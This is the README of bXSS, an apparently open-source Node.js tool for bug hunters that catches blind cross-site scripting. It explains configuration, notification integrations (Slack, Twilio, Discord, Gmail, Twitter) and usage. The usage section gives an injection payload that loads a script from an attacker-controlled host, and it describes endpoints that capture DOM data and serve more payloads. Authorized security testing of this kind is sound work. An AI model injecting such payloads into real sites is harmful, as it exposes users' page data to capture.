bXSS

bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.

bXSS supports the following:

• Intrusive Levels
• Email
  • Auto report via /.well-known/security.txt
• Twilio
• Slack
• Webex Teams
• Discord
• Twitter
• Payload Generation
• Save locally

Requirements

Baseline Requirements

• A server you control
• A usable domain
• Node.js and Express

Optional Requirements

• A SSL/TLS Certificate, free from Lets Encrypt (Optional)
• A Gmail account, to send reports via Nodemailer (Optional)
• A Twilio Account (Optional)
• A Slack Token (Optional)
• A Cisco Token (Optional)
• A Discord Token (Optional)
• A Twitter Developer Account (Optional)

Step-Up

Default

• cd bXSS && npm install
• Update The Configuration || Environment Variables
  • Domain
    • config.url = Domain intended for use e.g ardern.io
    • config.port = Port to run the Node.js app e.g 3030
  • Twilio (Optional, if you don't want to use Twilio just delete all Twilio references from the config)
    • config.twilio.accountSid = Twilio SID
    • config.twilio.authToken = Twilio Auth Token
    • config.twilio.to = ['+447500000000','+0018056826043'] Your telephone number(s)
    • config.twilio.from = Twilio telephone number
  • Slack (Optional, if you don't want to use Slack just delete all Slack references from the config)
    • config.slack.token = Slack Token
    • config.slack.channel = Channel you want to send the report to
    • Slack permissions required channels:read and chat:write
  • Cisco (Optional, if you don't want to use Cisco just delete all Cisco references from the config)
    • config.ciscoSpark.token = Cisco Token
    • config.ciscoSpark.sparkRoom = ['email1@domain.com','email2@domain.com']
  • Discord (Optional, if you don't want to use Discord just delete all Discord references from the config)
    • Steps to create a bot:
      • Visit https://discordapp.com/developers/applications/
      • Create a new application (e.g bXSSForCompany)
      • Make a note of your CLIENT ID
      • Select 'Bot'
        • Choose a USERNAME and press 'Click to Reveal Token' (copy the token)
      • Visit the following URL (update with your CLIENT ID) https://discordapp.com/oauth2/authorize?&client_id=YOUR_CLIENT_ID&scope=bot&permissions=2048
      • Select the server you want your bot to join and authorize
      • Update the following values below for the bot to post to the 'text channel' e.g ('general')
    • config.discord.token = 'your bot token'
    • config.discord.channel = 'channel you want it to join, e.g general'
  • Twitter (Optional, if you don't want to use Twitter just delete all Twitter references from the config)
    • config.twitter.consumer_key = API Key
    • config.twitter.consumer_secret = API Secret Key
    • config.twitter.access_token_key = Application Access Token
    • config.twitter.access_token_secret = Application Access Token Secret
    • Permissions (Write)
    • config.twitter.recipient_id = Twitter User ID, which can be found here
  • Gmail (Optional, if you don't want to use Gmail just delete all Gmail references from the config)
    • config.gmail.user = Gmail Username
    • config.gmail.pass = Gmail Password
    • config.gmail.to = ['email1@domain.com','email2@domain.com'] Where you want to send the emails
    • config.gmail.from = Who sent the message, usually Gmail Username
  • Rename configExample.js to config.js
• Start your app (depending on your preference)
  • node app.js
  • pm2 start app.js
  • nodemon app.js

Additional Steps (Optional)

• Obtain a let's Encrypt cert
  • Manual
  • certbot
• I would recommend looking at setting up a reverse proxy, for example in NGINX and skip the next step as I wouldn't want anyone to run express as root.
• Using Node.js
  • Update Configuration
    • config.letsEncrypt.TLS = true;
    • config.letsEncrypt.publicKey = $Path/fullchain.pem
    • config.letsEncrypt.privateKey = $Path/privkey.pem
    • config.letsEncrypt.ca = $Path/chain.pem
• Start your app (depending on your preference)
  • node app.js
  • npm2 start app.js
  • nodemon app.js

Using

Once the application is funcitonal, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:

"><script src="https://example.com/m"></script>

The application has five core functions to utilize:

• POST - /m (Captures DOM information)
• GET - /m (Loads the payload)
• GET - /mH (Captures HTTP interactions)
• Payloads - /payloads (Gives payloads you can use for testing blind xss)
• Everything else - Loads alert(1)

Contribute?

If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.